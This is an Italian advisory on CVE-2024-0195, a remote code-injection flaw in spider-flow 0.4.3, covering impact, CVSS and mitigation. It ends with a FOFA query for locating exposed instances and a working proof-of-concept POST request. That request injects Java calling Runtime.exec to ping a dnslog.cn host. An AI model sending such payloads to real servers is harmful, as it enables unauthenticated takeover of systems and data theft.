
CVE-2024-0195 Controllo improprio della generazione di codice ('Iniezione di codice')
CVE-2024-0195 è una vulnerabilità critica di code injection nell'applicazione web spider-flow 0.4.3, in particolare nella funzione FunctionService.saveFunction del file FunctionController.java. Un attaccante può iniettare da remoto codice dannoso che viene eseguito sul server. Ciò consente la compromissione totale dell'applicazione.
Questa vulnerabilità è estremamente grave poiché consente l'esecuzione remota di codice sul server che ospita l'applicazione spider-flow vulnerabile. Un attaccante potrebbe compromettere completamente il server, rubare dati sensibili, installare malware o miner di criptovalute e sfruttarlo per ulteriori attacchi all'interno della rete. La riservatezza, l'integrità e la disponibilità dell'applicazione e del server sono tutte compromesse in modo critico.
Non viene menzionata esplicitamente una versione corretta, quindi al momento l'applicazione di una patch non sembra essere un'opzione. La vulnerabilità è stata divulgata pubblicamente e sono disponibili exploit, pertanto una mitigazione immediata è fondamentale.
Fino al rilascio di una patch ufficiale, spider-flow 0.4.3 dovrebbe essere immediatamente messo offline o l'accesso limitato solo a reti/utenti fidati. I firewall per applicazioni web o altri controlli di validazione degli input potrebbero potenzialmente essere configurati per rilevare e bloccare i tentativi di code injection come mitigazione temporanea. Tuttavia, queste non sono soluzioni complete e la versione vulnerabile dovrebbe essere aggiornata non appena sarà disponibile una release corretta.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Prova di concetto
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B